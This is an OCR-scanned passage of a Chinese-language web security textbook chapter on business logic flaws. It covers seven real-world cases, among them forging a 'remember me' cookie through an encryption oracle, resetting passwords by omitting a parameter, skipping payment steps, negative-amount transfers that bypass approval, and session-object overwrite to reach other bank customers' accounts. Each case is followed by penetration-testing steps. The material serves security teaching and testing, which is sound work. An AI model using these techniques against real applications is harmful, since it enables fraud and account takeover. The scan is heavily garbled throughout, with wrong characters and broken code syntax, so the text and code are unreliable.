可 能 极其 微妙 ， 能 够 避 开 最 为 严格 的 代码 审查 或 渗透 测试 。 

与 SQL 注入 或 路 站 点 脚本 漏洞 不 同 ， 逻 辑 缺 陷 没 有 共有 的 “签名 ”。 当 然 ， 定 义 特性 是 指 应 
用 程序 执行 的 逻辑 存在 某 种 缺陷 。 许多 时 候 , 逻辑 缺陷 表现 为 设计 者 或 开发 者 在 思考 过 程 中 做 出 
的 特殊 假设 存在 明显 或 隐 含 的 错误 。 简 单 来 讲 ， 程 序 员 可 能 这 样 认 为 :“ 如 末 发 生 A， 就 一 定 会 
出 现 B,， 因 此 我 执行 C。” 他 们 并 不 会 提出 截然 不 同 的 问题 :“ 如 果 发 生 X 会 怎样 ? ”因而 没有 考虑 
到 假设 以 外 的 情形 。 在 许多 情况 下 ， 这 种 错误 的 假设 会 造成 大 量 的 安全 漏洞 。 

近 些 年 来 ， 人 们 防范 常见 Web 应 用 程序 漏洞 的 意识 已 经 增强 ， 一 些 漏洞 的 出 现 几率 与 严重 程 
度 也 显著 降低 。 然而， 鉴于 逻辑 缺陷 的 本 质 ， 即 使 是 实施 安全 开发 标准 、 使 用 代码 审查 工具 或 常 
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规 活 透 测 试 ,我 们 仍然 无 法 避免 这 种 缺陷 。 逻 辑 缺 陷 的 多 样 性 本 质 ， 以 及 探查 与 防止 它们 往往 需 
要 从 各 个 不 同 的 角度 思考 问题 ， 预 示 着 在 很 长 一 段 时 期 内 ， 逻 辑 缺 陷 仍 将 大 量 存在 。 因 此 ， 精 明 
的 攻击 者 会 特别 注意 目标 应 用 程序 采用 的 逻辑 方式 ， 设 法 了 解 设 计 者 与 开发 者 做 出 的 可 能 假设 ， 
然后 考虑 如 何 攻 破 这 些 假设 。 


11.2 ”现实 中 的 逻辑 缺陷 


竺 握 理论 知识 并 不 是 了 解 逻 辑 缺 陷 的 最 佳 办 法 , 通过 实例 进行 学 习 才 是 最 佳 途径 。 虽 然 各 种 
逻辑 缺陷 之 间 存 在 巨大 的 差异 , 但 它们 仍 包含 一 些 共同 特征 ,并 证 实 开 发 者 总 会 犯 各 种 各 样 的 错 
误 。 因 此 ， 从 研究 逻辑 缺陷 实例 获得 的 局 示 有 助 于 攻击 者 在 各 种 不 同 的 情况 下 发 现 新 的 缺陷 。 

















11.2.1 例 1: 征求 提示 


笔者 曾 在 许多 不 同类 型 的 应 用 程序 中 发 现 “ 加 蜜 提示” 漏洞 。 攻 击 者 可 以 利用 这 种 漏洞 实施 
各 种 攻击 ， 如 解密 打印 软件 中 的 域 证 书 或 破坏 云 计算 。 下 面 是 这 种 漏洞 的 一 个 典型 示例 ,是 在 一 
个 软件 销售 站 点 上 发 现 的 。 

1. 功能 

该 应 用 程序 实施 “ 记 住 我 ”功能 ， 人 允许 应 用 程序 在 浏览 器 中 设置 一 个 永久 cookie， 用 户 从 而 
无 须 登 录 即 可 访问 应 用 程序 。 这 个 cookie 受 到 一 个 加 密 算法 的 保护 ， 以 防止 算 改 或 披露 。 该 算法 
基于 一 个 由 姓名 、 用 户 ID 和 不 定数 据 组 成 的 字符 串 ， 以 确保 合成 值 是 唯一 的 ， 并 且 无 法 预测 。 为 
确保 能 够 访问 该 cookie 的 攻击 者 无 法 实施 重 放 攻击 , 应 用 程序 还 收集 机 天 专用 的 数据 , 包括 IP 地 址 。 

于 是 ， 这 个 cookie 被 视 为 一 个 可 靠 的 解决 方案 ， 用 于 保护 业务 功能 中 吻 受 攻击 的 部 分 。 

除 “ 记 住 我 ”功能 外 ， 该 应 用 程序 还 具有 另 一 项 功能 ， 将 用 户 的 昵称 存储 在 一 个 名 为 
ScreenName 的 cookie 中 。 这 样 ， 在 用 户 下 次 访问 该 站 点 时 ， 就 可 以 在 站 点 的 角落 位 置 收 到 个 性 
化 的 问候。 鉴于 这 个 名 称 也 属于 安全 信息 ， 因 此 也 应 对 它 进行 加 密 。 

2. 假设 

开发 者 认为 ， 与 RememberMe cookie 相 比 ，ScreenName cookie 对 攻击 者 而 言 价值 不 大 ， 于 是 
他 们 决定 使 用 相同 的 加 密 算 法 来 保护 这 两 个 cookie。 他 们 没有 考虑 到 的 是 ， 用 户 可 以 指定 自己 的 
昵称， 并 在 屏幕 上 查看 该 名 称 。 这 在 无 意 间 使 用 户 能 够 访问 用 于 保护 永久 刁 份 验证 令 牌 
RememberMe 的 加 密 功 能 ( 及 加 密 密 钥 )。 

3. 攻击 万 法 

竺 一 个 简单 的 攻击 中 ， 用 户 提 交 其 RememberMe cookie 的 加 密 值 来 蔡 代 加 密 的 ScreenName 
cookie。 在 回 用 户 显示 了 昵称 时 ， 应 用 程序 将 解密 该 什 ， 如 果 解 密 成 功 ， 将 在 屏幕 上 显示 结果 。 这 
个 过 程 生 成 了 如 下 消息 : 

Welcome, marcus|734|192.168.4.282750184 

虽然 这 是 个 有 趣 的 问题 , 但 不 一 定 是 个 高 风险 的 问题 。 它 只 是 说 明 , 攻击 者 可 以 列 出 加 密 的 
RememberMe cookie 的 内 容 ， 包 括 用 户 名 、 用 户 有 D 和 IP 地 址 。 由 于 cookie 中 没有 保存 密码 ， 攻 击 
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者 并 没有 办 法 对 获得 的 信息 立即 加 以 利用 。 

真正 的 问题 在 于 ， 用 户 能 够 指定 他 们 的 昵称 。 因 此， 用 户 可 以 选择 自己 的 昵称 ， 例如: 

admin | 1] | 192.168.4.282750184 

如 果 用 户 退 出 系统 然后 重新 登录 ， 应 用 程序 就 会 加 密 这 个 什 ， 将 它 作为 加 密 的 ScreenName 
cookie 存 储 在 用 户 的 浏 览 锅 中 。 如 果 攻 击 者 提交 这 个 加 密 的 令 牌 ， 将 它 作为 RememberMe cookie 
的 值 ， 应 用 程序 就 会 解密 该 cookie， 读 取 用 户 ID ， 并 让 攻击 者 以 管理 员 身 份 登录 。 即 使 应 用 程序 
采用 三 重 DES 加 密 ， 使 用 强大 的 密 钥 并 阻止 重 放 攻 击 ， 攻 击 者 仍然 可 以 将 应 用 程序 作为 “加 密 提 
示 ”， 以 解密 并 加 密 任 意 值 。 

















渗透 测试 步 又 


这 种 类 型 的 漏洞 表现 在 许多 不 同 的 情况 下 , 包括 账户 恢复 令 牌 ; 基于 令 牌 访问 经 过 验证 的 








资源 ; 以 及 问 客 户 问 发送 的 、 和 需要 防 算 改 或 对 用 户 不 可 读 的 任何 其 他 值 。 

(1) 在 应 用 程序 中 查找 任何 使 用 加 密 ( 而 非 散 列 ) 的 位 置 。 确 定 任何 应 用 程序 加 密 或 解密 
用 户 提交 的 人 的 位 置 , 并 演 试 着 代 在 应 用 程序 中 发 现 的 任何 其 他 加 密 值 。 壬 试 在 应 用 程序 中 导 
致 可 以 揭示 加 密 值 ， 或 可 以 在 屏 噶 上 “有 意 ” 显 示 加 黎 值 的 错误 。 

(2) 确定 应 用 程序 中 可 以 通过 提交 加 密 值 导致 在 啊 应 中 显示 对 应 的 解密 值 的 位 置 ， 以 查找 
“提示 提示 ”漏洞 。 确 定 这 种 漏洞 是 否 会 导致 敏感 信息 〈 如 密码 或 信用 卡 ) 被 披露 。 

(3) 确定 可 以 通过 提交 明文 值 导 健 应 用 程序 返回 对 应 的 加 密 值 的 位 置 ， 以 查找 “提示 加 密 ” 
漏洞 。 确 定 是 否 可 以 通过 指定 任意 值 ， 或 应 用 程序 将 会 处 理 的 恶意 有 效 载 傈 ,对 这 种 漏洞 加 以 
利用 。 























11.2.2 例 2: 欺骗 密码 修改 功能 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 以 及 AOL AIM 企 业 网 关 应 用 程序 中 发 现 过 
这 种 逻辑 缺陷 。 

1. 功能 

应 用 程序 为 终端 用 户 提 供 密 但 修改 功能 。 它 有 要求 用 户 荐 写 用 户 名 、 现 有 密码 、 新 密码 与 确认 
新 蜜 但 字段 。 

应 用 程序 还 为 管理 员 提 供 密 但 修改 功能 。 这 项 功能 允许 他 们 修改 任何 用 户 的 密码 ， 而 不 必 提 
交 现 有 密码 。 这 两 项 功能 在 同一 个 服务 硕 端 脚本 中 执行 。 

2. 假设 

应 用 程序 为 用 户 和 管理 员 提 供 的 客户 端 界面 仅 有 一 点 不 同 :在 管理 员 界 面 中 没有 用 于 十 写 现 有 
密码 的 字段 。 当 服务 妖 端 应 用 程序 处 理 密码 修改 请 求 时 , 它 通 过 其 中 是 否 包含 现 有 密码 参数 确定 请 
求 是 来 自 管理 员 ， 还 是 来 自 普 通用 户 。 换 句 话 说， 它 认 为 普通 用 户 总 会 提交 现 有 密码 人 参数。 

负责 执行 这 项 功能 的 代码 如 下 : 
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String existingPassword = request.getParameter ("existingPassword").; 

if {null == existingPassword) 

{ 
trace{"Old password not supplied, must be an administrator"); 
return true; 

; 

else 

{ 


trace{"Verifying user's old password"): 


3. 攻击 方法 

一 旦 确定 开发 者 做 出 的 假设 后 ,逻辑 缺陷 就 变 得 非常 明显 。 当 然 ， 普 通用 户 也 可 以 提交 并 不 
包含 现 有 密码 参数 的 请 求 ， Is -个 方面 。 

这 种 逻辑 缺陷 可 能 给 应 用 程序 造成 巨大 破坏 ,攻击 者 可 利用 这 种 缺陷 重新 设置 任何 用 户 的 密 
人 码 ， 完 全 控制 他 们 的 账户 。 

















渗透 秀 测试 步骤 








(1) 在 关键 功能 中 探查 逻辑 缺陷 时 ,尝试 轮流 删除 在 请 求 中 提交 的 每 一 个 参数 ,包括 cookie、 
查询 字符 串 字 段 与 PosT 数 据 项 。 

(2) 既 要 删除 参数 名 称 ， 也 要 删除 参数 值 。 不 要 只 提交 一 个 空 字符 串 ， 因 为 服务 需 会 对 这 
种 字符 串 另 做 处 理 。 

(3) 一 次 仅 攻 击 一 个 参数 ， 确 保 到 达 应 用 程序 中 所 有 与 参数 有 关 的 代码 路 径 。 

(4) 如 果 控 制 的 请 求 属 于 多 阶段 过 程 ， 一 定 要 完成 整个 过 程 ， 因 为 后 面 的 一 些 逻 辑 可 能 会 
处 理 在 前 面 的 步 又 中 提交 并 在 会 话 中 保存 的 数据 。 





11.2.3 例 3: 直接 结算 


我 们 曾 在 一 家 网 上 零售 商 使 用 的 Web 应 用 程序 中 发 现 过 这 种 逻辑 缺陷 。 

1. 功能 

下 订单 的 过 程 包括 以 下 步骤。 

(浏览 产品 目录 并 往 购物 车 中 添加 商品 。 

(2) 返回 购物 车 并 最 终 确 认 订 单 。 

(3) 输入 文 付 信息 。 

(4) 输入 交 货 信息 。 

2. 假设 

开发 者 认为 用 户 总 会 按 预 定 的 顺序 执行 每 一 个 步骤 , 因为 这 是 应 用 程序 通过 显示 在 浏览 硕 中 
的 导航 链接 和 表单 向 用 户 提 供 的 处 理 顺 序 。 因 此 , 开发 者 认为 任何 完成 订购 过 程 的 用 户 一 定 已 经 
提交 了 令 人 满意 的 文 付 信息 。 
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3. 攻击 方法 

很 明显 ,开发 者 的 假设 存在 缺陷 。 用 户 控制 着 他 们 回应 用 程序 提出 的 每 一 个 请 求 ， 因 此 能 够 
按 任何 顺序 访问 订购 过 程 的 每 一 个 阶段 。 如 果 直 接 从 第 (2) 步 进入 第 (4) 步 ， 攻 击 者 就 可 生成 一 个 
最 终 确定 交 贷 、 但 实际 上 并 未 支付 的 订单 。 

















渗透 测试 步 双 


发 现 并 利用 这 种 缺陷 的 技巧 叫 作 强制 浏览 , 包括 避 开 浏览 硕 导 航 对 应 用 程序 功能 访问 顺序 
实施 的 任何 控制 。 

(1) 如 果 一 个 多 阶段 过 程 需要 按 预 定 的 顺序 提交 一 系列 请 求 ， 符 试 按 其 他 顺序 提交 这 些 请 
求 。 答 试 完全 省 略 茶 些 阶段 、 几 次 访问 同一 个 阶段 或 者 推 后 访问 前 一 个 阶段 。 

(2) 这 些 阶 段 的 结果 可 通过 一 系列 指向 特殊 URL 的 GET 或 PosT 请 求 进 行 访问 ， 或 者 需要 向 
同一 个 URL 提 交 不 同 的 参数 ,被 访问 的 阶段 可 通过 在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指 
定 。 确 保 完 全 了 人 解 应 用 程序 访问 特殊 阶段 所 使 用 的 机 制 。 

(3) 根据 执行 功能 的 情形 ， 试 图 了 解 开 发 者 做 出 的 假设 及 主要 受 攻 击 面 位 于 何 处 。 设 法 找 
到 违反 这 些 假 设 从 而 在 应 用 程序 中 造成 反常 行为 的 方法 。 

(4) 如 琳 不 按 顺 序 访问 多 阶段 功能 ， 应 用 程序 第 第 表现 出 一 系列 寞 常 现象 ， 如 变量 值 为 空 
字符 或 未 被 初始 化 、 状 态 仅 部 分 定义 或 相互 矛盾 以 及 其 他 无 法 预料 的 行为 。 这 时 ,应 用 程序 可 
能 会 运 回 有 用 的 错误 消 奶 与 调试 结果 , 可 用 于 充分 了 解 其 内 部 机 制 并 对 当前 或 其 他 攻击 进行 优 
化 〈 请 参阅 第 15 章 了 解 相关 内 容 ) 有 时 ， 应 用 程序 可 能 会 进入 一 种 完全 出 乎 开发 者 意料 的 状 
态 ， 导 致 严重 的 安全 缺陷 。 























有 

本 4 注解 许多 类 型 的 访问 控制 漏洞 与 这 种 逻辑 缺陷 类 似 。 如 果 一 项 特权 功能 需要 完成 几 
个 按 预 定 顺序 访问 的 阶段 才能 实现 处 理 ， 应 用 程序 可 能 认为 用 户 总 会 按 这 个 顺序 处 理 

该 项 功能 。 应 用 程序 可 能 会 对 这 个 过 程 的 初始 阶段 实施 严格 的 访问 控制 ， 并 认为 任何 


到 达 后 面 阶段 的 用 户 一 定 已 经 获得 相关 授权 。 如 果 一 个 低 权 限 的 用 户 直接 进入 了 后 面 
的 一 个 阶段 ， 他 就 能 够 无 限制 地 访问 这 个 功能 。 请 参阅 第 8 章 了 解 查找 并 利用 这 种 漏洞 
的 详情 。 





11.2.4 例 4: 修改 保险 单 


我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 中 遇 到 过 这 种 逻辑 缺陷 。 

1. 功能 

应 用 程序 为 用 户 提供 保险 报价 ， 如 果 需 要 ， 用 户 可 在 线 完 成 并 提交 一 份 保险 申请 。 这 个 过 程 
包括 如 下 几 个 阶段 。 
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口 第 一 阶段 ， 申 请 人 提交 一 些 基 本 信息 ， 并 指定 首选 月 保费 或 希望 投保 的 金额 。 应 用 程序 
提供 一 个 报价 ， 同 时 计算 申请 人 并 未 指定 的 其 他 值 。 
口 后 几 个 阶段 ， 申 请 人 提交 其 他 各 种 个 人 信息 ， 包 括 健康 状况 、 职 业 与 爱好 。 
口 最 后 , 应 用 程序 连接 一 名 为 保险 公司 工作 的 保险 员 。 保险 员 使 用 该 Web 应 用 程序 审核 申请 
人 提交 的 信息 ， 并 决定 是 否 接 受 申 请 ， 或 者 修改 最 初 的 报价 以 反映 任何 额外 的 风险 。 
在 上 述 的 每 一 个 阶段 中 , 应 用 程序 使 用 一 个 共享 组 件 处 理 用 户 提 交 的 每 一 个 参数 。 这 个 组 件 
将 每 个 PosT 请 求 中 的 所 有 数据 解析 成 名 / 值 对 ， 并 使 用 收 到 的 数据 更 新 其 状态 信息 。 

2. 假设 

处 理 用 户 提交 的 数据 的 组 件 认为 每 个 请 求 仪 包含 用 户 在 相关 HTML 表 单 中 提交 的 参数 。 而 开 
发 者 并 未 考虑 到 这 种 情形 : 如 果 一 名 用 户 提 交 了 应 用 程序 并 不 希望 他 提交 的 参数 , 将 会 出 现 什么 
情况 。 

3. 攻击 方法 

上 述 假 设 当然 存在 缺陷 ， 因 为 用 户 可 在 每 个 请 求 中 提交 任意 参数 与 参数 值 。 因 此 ， 应 用 程序 

的 核心 功能 有 许多 不 完善 的 地 方 。 

口 攻击 者 可 以 利用 共享 组 件 避 开 所 有 服务 天 端 的 输入 确认 。 在 报价 过 程 的 每 一 个 阶段 ， 应 
用 程序 对 这 些 阶 段 提 交 的 数据 执行 严格 的 确认 ， 并 拒绝 任何 未 通过 这 种 确认 的 数据 。 但 
是 ， 共 享 组 件 使 用 用 户 提 交 的 每 一 个 参数 更 新 应 用 程序 的 状态 。 因 此 ， 如 果 攻 击 者 提供 
应 用 程序 在 较 早 阶段 需要 的 一 个 名 / 值 对 ， 不 按 顺 序 提交 数据 ， 那 么 应 用 程序 将 不 对 其 进 
行 任何 确认 ， 下 接 接 受 并 处 理 该 数据 。 如 有 果 出 现 这 种 情况 ， 恶 意 用 户 就 可 以 据 此 实施 针 
对 保险 员 的 保存 型 跨 站 点 脚本 攻击 ， 访 问 属 于 其 他 应 用 程序 的 个 人 信息 〈 请 参阅 第 12 章 
了 解 相 关内 容 )。 

口 攻击 者 能 够 以 任意 价格 购买 保险 。 在 报价 过 程 的 第 一 阶段 ， 申 请 人 指定 他 们 首选 的 月 保 
费 或 希望 投保 的 金额 ， 应 用 程序 据 此 计算 其 他 值 。 然 而 ， 如 采用 户 在 后 续 某 个 阶段 为 上 
面 的 一 个 或 几 个 数据 项 提交 新 的 什 ， 那 么 应 用 程序 将 根据 这 些 值 更 新 目 己 的 状态 。 不 按 
顺序 提交 这 些 参数 ， 攻 击 者 就 可 以 获得 任意 价格 的 保险 报价 及 任意 月 保费 。 

口 应 用 程序 并 不 对 某 一 类 用 户 能 够 提交 哪些 参数 实施 访问 控制 。 当 保险 员 审 核 完 成 的 申请 
时 ， 他 们 会 更 新 各 种 数据 ， 包 括 做 出 承保 决定 。 这 些 数据 由 人 处理 普通 用 户 提 交 的 数据 的 
同一 个 共享 组 件 处 理 。 如 有 果 攻 击 者 知道 或 猜测 出 保险 员 在 审查 申请 时 使 用 的 参数 名 称 ， 
就 可 以 提交 这 些 参数 ， 不 用 签署 保单 即 可 接受 目 己 的 申请 。 





































































































渗透 测试 步 又 


这 些 缺 陷 可 严重 危及 应 用 程序 的 安全 , 但 是 , 如 末 攻 击 者 仅 拦 截 浏览 此 请 求 并 修改 被 提交 








的 参数 值 ， 还 是 无 法 确定 其 中 任何 一 个 缺陷 。 
(1) 只 要 应 用 程序 通过 儿 个 阶段 执行 一 项 关键 操作 ， 就 应 该 提取 在 某 个 阶段 提交 的 参数 ， 
然后 尝试 在 力 一 个 阶段 提交 这 些 参数 。 如果 相关 数据 随 应 用 程序 的 状态 一 起 更 新 , 应 该 探索 这 
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种 行为 的 了 衍生 效 末 ， 确 定 是 否 可 以 利用 它 实 施 任何 恶意 操作 ， 如 前 面 的 3 个 示例 所 述 。 

(2) 如 果 应 用 程序 执行 一 项 功能 ， 不 同类 型 的 用 户 可 根据 一 组 共同 的 数据 更 新 或 执行 其 他 
操作 , 应 该 利用 每 种 类 型 的 用 户 执行 该 功能 并 观察 他 们 提交 的 参数 。 如 果 不 同 的 用 户 提 交 不 同 
的 参数 ,就 提取 由 一 名 用 户 提 交 的 每 个 参数 ,并 尝试 以 其 他 用 户 的 映 份 提交 这 些 参数 。 如 果 应 
用 程序 接受 并 处 理 这 些 参 数 ， 如 前 面 所 述 ， 探 索 这 种 行为 的 衍生 效果 。 

















11.2.5 例 5: 入 侵 银 行 


我 们 曾 在 一 家 大 型 金融 服务 公司 使 用 的 Web 应 用 程序 中 遇 到 过 这 种 逻辑 缺陷 。 
1. 功能 
应 用 程序 允许 尚未 使 用 在 线 应 用 程序 的 顾客 进行 注册 。 然后 , 应 用 程序 要 求 新 用 户 提供 一 些 
基本 的 个 人 信息 , 在 一 定 程 度 上 确认 他 们 的 吴 份 。 这 些 信息 包含 姓名 、 地 址 和 出 生日 期 ， 但 并 不 
包括 任何 机 密 信 息 ， 如 现 有 和 密码 或 PIN 号 但 。 
顾客 正确 输入 这 些 信 息 后 ,应 用 程序 再 将 注册 请 求 转交 给 后 端 系统 处 理 。 然 后 ， 再 向 用 户 注 
册 的 家 硅 地 址 邮寄 一 个 信息 包 圳 。 包 右 内 含有 如 何 通过 给 公司 呼叫 中 心 拨 打 电 话 激活 在 线 访 问 的 
旧 导 ， 以 及 用 户 在 第 一 次 登录 应 用 程序 时 使 用 的 一 次 性 密码 。 
2. 假设 
应 用 程序 的 设计 者 认为 这 种 机 制 可 为 防止 未 授权 访问 提供 强大 的 保护 。 该 机 制 实 施 以 下 3 层 
保护 。 
口 应 用 程序 要 求 用 户 提 前 输入 一 部 分 个 人 信息 ， 阻 止 恶意 攻击 者 或 恶作剧 用 户 以 其 他 用 户 
的 吴 份 进行 注册 。 
D 注册 过 程 包括 以 非常 规 邮 寄 的 形式 回顾 客 注册 的 家 寿 地 址 传送 一 些 机 密 信 息 。 要 想 实施 
攻击 ,任何 攻 击 者 都 必须 盗 取 受害 人 的 个 人 邮件 。 
口 注册 功能 要 求 顾客 给 呼叫 中 心 拨 打 电 话 ,并 根据 个 人 信息 与 在 PIN 号 码 中 选择 的 数字 ， 以 
常规 方式 核实 他 们 的 映 份 。 
这 种 设计 确实 非常 安全 。 但 是 ， 该 机 制 的 实际 执行 过 程 存 在 逻辑 缺陷 。 
执行 注册 机 制 的 开发 者 需要 以 茶 种 方式 保存 用 户 提 区 的 个 人 信息 ,并 将 它们 与 公司 数据 库 中 储 
存 的 客户 号 份 大 联 起 来 。 由 于 希望 重复 利用 现 有 代码 ， 他 们 使 用 以 下 这 个 似乎 能 够 满足 要 求 的 类 : 
class CCustomer 


{ 




































































String firstName;: 
String lastName; 


CDoB dob; 
CAddress homeaAddress: 


long custNumber; 
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获得 用 户 信 息 后 ， 这 个 对 象 被 实例 化 , 与 提交 的 信息 一 起 保存 在 用 户 会 话 中 。 然 后 ， 应 用 程 
厅 核 对 用 户 信息 ， 如 果 信 息 有 效 ， 束 给 该 用 户 分 配 一 个 唯一 的 顾客 号 码 ， 并 将 其 用 在 公司 的 所 有 
系统 中 。 随 后 ， 应 用 程序 将 这 个 号 但 连同 用 户 的 其 他 一 些 有 用 信息 ,一 起 添加 到 这 个 对 象 中 。 最 
后 ， 这 个 对 象 被 传送 至 处 理 注册 请 求 的 后 端 系 统 进行 处 理 。 

开发 者 认为 使 用 这 个 代码 组 件 并 无 妨碍 ,不 会 造成 任何 安全 问题 。 然 而 ,这 种 错误 的 假设 可 
能 会 造成 严重 的 后 采 。 

3. 攻击 方法 

应 用 程序 的 其 他 功能 ( 包括 核心 功能 ) 也 使 用 合并 到 注册 功能 中 的 相同 代码 组 件 ， 核 心 功能 
人 允许 通过 验证 的 用 户 访 问 账户 、 账 目 、 转 账 和 其 他 信息 。 一 名 注册 用 户 成 功 通过 应 用 程序 的 验证 
后 ， 这 个 对 象 也 被 实例 化 ， 并 保存 在 他 的 会 话 中 , 用 于 存储 与 其 身份 有 关 的 关键 信息 。 应 用 程序 
的 绝 大 多 数 功 能 在 执行 操作 时 引用 这 个 对 象 中 保存 的 信息 。 例如 ,应 用 程序 根据 保存 在 这 个 对 象 
中 的 唯一 顾客 号 人 码 生成 在 用 户主 页 面 显示 的 账户 信息 。 

应 用 程序 的 其 他 功能 已 经 使 用 这 个 代码 组 件 , 意味 者 开发 者 的 假设 存在 缺陷 , 应 用 程序 重复 
使 用 它们 的 方式 确实 会 造成 一 个 巨大 的 漏洞 。 

虽然 这 个 漏洞 非常 严重 , 但 实际 上 我 们 很 难 发 现 并 利用 这 个 漏洞 。 应 用 程序 的 主要 功能 受到 
几 层 访问 控制 的 保护 , 用 户 需 要 拥有 一 个 完全 合法 的 会 话 才 能 通过 这 些 控制 。 因 此 ， 为 利用 这 个 
逻辑 缺陷 ， 攻 击 者 需要 执行 以 下 步 又 。 

口 使 用 他 目 己 的 有 效 账户 证 书 登 录 应 用 程序 。 

口 使 用 登录 后 得 到 的 通过 验证 的 会 话 ， 访 问 注 册 功 能 并 提交 男 一 名 顾客 的 个 人 信息 。 这 样 ， 

应 用 程序 就 会 用 一 个 与 目标 顾客 有 关 的 对 象 , 重 写 攻 击 者 会 话 中 最 初 的 ccustomer 对 象 。 

口 返回 应 用 程序 主要 功能 并 访问 其 他 顾客 的 账户 。 

从 “墨盒 ”角度 探查 应 用 程序 时 ， 这 种 漏洞 并 不 明显 。 同 时 ， 当 审查 或 编写 源 代 但 时 ， 我 们 
也 很 难 发 现 它 。 如 果 未 能 明确 、 全 面 地 了 解 应 用 程序 及 其 在 不 同 区 域 使 用 的 各 种 组 件 , 我 们 可 能 
无 法 知道 开发 者 做 出 的 错误 假设 。 当 然 , 添加 明确 注释 的 源 代 码 与 设计 文档 也 有 助 于 降低 引入 或 
探测 不 到 这 种 缺陷 的 可 能 性 。 






































































































































渗透 测试 步 又 


(1) 在 一 个 需要 隔离 水 平权 限 或 垂直 权限 的 复杂 应 用 程序 中 ， 设 法 确定 个 体 用 户 能 够 在 会 














话 中 “聚积 ”大 量 与 其 身份 有 关 的 状态 信息 的 所 有 情况 。 
(2) 答 试 浏览 一 个 功能 区 域 ， 然 后 转换 到 夯 一 个 完全 无 关 的 区 域 ， 确 定 任何 聚积 的 状态 信 
恩 是 否 会 对 应 用 程序 的 行为 造成 影响 。 





11.2.6 ” 例 6: 规避 交易 限制 
我 们 在 一 家 制造 公司 使 用 的 基于 Web 企 业 资源 规划 的 应 用 程序 中 发 现 过 这 种 逻辑 缺陷 。 
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1. 功能 

财务 人 员 有 资格 在 公司 拥有 的 银行 账户 与 公司 关键 客户 和 供应 商 的 账户 之 间 进 行 转账 ,为 防 
止 金 融 欺 诈 ， 应 用 程序 将 大 多 数 用 户 的 转账 金额 限制 在 10 000 美 元 之 内 。 如 末 转 账 金额 超出 这 个 
限制 ， 就 需要 得 到 高 级 经 理 的 批准 。 

2. 假设 

应 用 程序 中 负责 金额 检查 的 代码 极其 简单 : 

bool CAuthCheck: :RequiresApproval (int amount ， 

{ 




















if (amount <= m apprThreshold) 
return false:; 
else return true:; 


} 

开发 者 认为 这 种 透明 的 检查 非常 安全 。 如 打转 账 金 额 超出 预先 设 定 的 限制 ， 只 有 得 到 高 级 经 
理 的 许可 交易 才能 进行 。 

3. 攻击 方法 

开发 者 的 假设 存在 缺陷 , 因为 他 完全 忽略 了 用 户 用 负 人 金额 进行 转账 的 可 能 性 。 由 于 任何 负 值 
都 小 于 转账 金额 限制 , 因此 不 需要 得 到 进一步 的 批准 。 但 是 , 应 用 程序 的 银行 模块 接受 负 值 转账 ， 
并 以 反问 正 值 转账 的 形式 对 其 进行 处 理 。 因 此 ， 如 果 用 户 希 望 从 A 账户 转账 20 000 美 元 到 B 账 户 ， 
他 只 需 从 B 账 户 转账 -20 000 美 元 到 A 账户 ， 即 可 得 到 相同 的 效果 ， 并 且 不 需要 经 过 批准 。 应 用 程 
序 实施 的 反 欺 诈 防 御 措 施 也 被 轻易 吉 开 1 



































注解 ”许多 Web 应 用 程序 在 它们 的 交易 逻辑 中 采用 数字 限额 ， 例 如 : 
口 零售 应 用 程序 禁止 用 户 订购 超出 其 库存 量 的 商品 ; 
口 银行 应 用 程序 禁止 用 户 支付 超出 其 当前 账户 余额 的 账单 ; 
口 保险 应 用 程序 根据 年 龄 限制 调整 报价 。 
找到 规避 这 个 限额 的 方法 通常 并 不 表示 应 用 程序 存在 安全 漏洞 。 但 是 ， 这 样 做 会 


造成 严重 的 商业 后 果 ， 并 表示 所 有 者 依赖 应 用 程序 实施 的 控制 存在 缺陷 。 
在 发 布 应 用 程序 前 执行 的 用 户 验收 测试 过 程 中 ， 我 们 通常 可 以 检测 出 最 明显 的 漏 
洞 。 然 而 ， 隐 藏 较 深 的 漏洞 依然 存在 ， 特 别 是 操纵 隐藏 参数 造成 的 漏洞 。 





渗透 测试 步骤 

答 试 规避 交易 限制 的 第 一 步 是 了 解 受 控制 的 相关 输入 接受 哪些 字符 。 

(1) 符 斌 输入 负 值 ， 看 应 用 程序 是 否 接受 这 些 值 并 投 预 想 的 方式 对 它们 进行 处 理 。 

(2) 可 能 需要 执行 几 步 操作 ， 改 变 应 用 程序 的 状态 ， 使 其 对 攻击 有 有 用。 例如， 可 能 需要 在 
账户 之 间 进 行 几 次 转账 ， 直 到 得 到 可 提取 的 适当 余额 。 
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11.2.7 ” 例 7: 获得 大 幅 折 扣 


我 们 在 一 家 软件 供应 商 的 零售 应 用 程序 中 遇 到 过 这 种 逻辑 缺陷 。 

1. 功能 

应 用 程序 允许 用 户 订 购 软件 产品 ， 如 采购 买 的 商品 达到 一 定数 量 ， 束 有 资格 获得 大 幅 折扣 。 
例如 ， 如 采用 户 分 别 购买 了 一 短 防 病毒 解决 方案 、 个 人 防火 墙 与 防 垃圾 邮件 软件 ， 他 就 可 以 获得 
25% 的 折扣 。 

2. 假设 

当 用 户 在 购物 车 中 增加 一 件 商品 时 , 应 用 程序 就 使 用 各 种 规则 决定 他 选择 购买 的 产品 是 否 让 
他 有 资格 获得 任何 折扣 。 如 采用 户 可 以 获得 折扣 , 应 用 程序 就 根据 折扣 率 调整 购物 车 中 的 商品 价 
格 。 开 发 者 认为 用 户 只 有 购买 拥 绑 销 售 的 商品 ， 才 能 获得 折扣 。 

3. 攻击 方法 

开发 者 的 假设 存在 相当 明显 的 缺陷 , 因为 该 假设 负 略 了 一 个 事实 ,， 即 用 户 辐 购物 车 中 添加 商 
品 后 可 能 会 再 将 其 从 中 移 走 。 狭 猎 的 用 户 可 能 会 往 购物 车 中 添加 供应 商 出 售 的 大 量 产品 ， 以 获得 
最 大 可 能 的 折扣 。 当 购物 车 中 的 商品 可 以 采用 折扣 时 ， 他 就 会 把 不 需要 的 商品 从 中 取 走 ， 而 购物 
车 中 剩 下 的 商品 仍然 可 以 享受 原来 的 折扣 。 





























渗透 测试 步 又 





(1) 如 采 有 任何 价格 或 其 他 敏感 价值 需要 根据 用 户 控 制 的 数据 或 操作 确定 的 标准 进行 调 
整 , 首先 应 了 解 应 用 程序 使 用 的 算法 以 及 需要 调整 的 逻辑 。 确 定 这 些 调整 是 一 次 性 行为 ,还 是 
需要 根据 用 户 执行 的 其 他 操作 进行 修改 。 

